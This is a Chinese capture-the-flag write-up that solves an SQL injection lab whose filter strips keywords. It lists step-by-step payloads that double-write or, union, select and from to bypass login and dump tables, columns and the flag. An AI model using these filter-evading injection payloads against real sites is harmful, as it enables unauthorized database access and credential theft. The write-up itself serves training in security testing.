访问链接,我们看到熟悉的界面,不过页面上的提示内容变了,告诉了我们这里会有过滤
我们首先用万能密码尝试登录,提示我们账号或者密码错误,可以证明 符号 or并没有起作用,应该是被过滤掉了,也证明了此处仍然存在注入点
admin'or'1'='1'#
尝试复写or进行绕过,登陆成功,证明这一关的过滤应该是把关键词过滤为空
admin'oorr'1'='1'#
接下来我们进行联合注入,首先判断有几列,有错误提示,我们发现原本我们输入的order by 3
在页面中提示变成了 der 3, 可以得出结论,or和by被过滤为空
1‘' order by 3#
同样我们双写绕过,提示下列信息证明绕过成功,经过验证页面查询结果为3列(为4时报错)
1‘' oorrder bbyy 3#
接下来联合查询进行查询回显的点,仍然报错 ,根据报错信息可知:union,select都被过滤为空了
-1‘' union select 1,2,3#
仍然复写绕过,得到回显点,2和3处
-1‘' uniounionn seselectlect 1,2,3#
接下来爆破数据库,为 geek
-1‘' uniounionn seselectlect 1,database(),3#
然后爆表,这里试了好多次,一直以为information和schema也被过滤了,后来发现并没有,过滤的还是or,from也被过滤了
-1' uniounionn seselectlect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema='geek'#
继续爆字段名:id,username,password
-1' uniounionn seselectlect 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns whewherere table_name='b4bsql'#
查询所有的username,发现flag
-1' uniounionn seselectlect 1,2,group_concat(username) frofromm b4bsql#
查询flag的值
(这里我用这个语句查询会报错,但是我并没有发现哪里不对
-1' uniounionn seselectlect 1,2,passwoorrd ffrromom b4bsql where username=flag#)
1' uunionnion sselectelect 1,2,group_concat(passwoorrd) ffromrom b4bsql#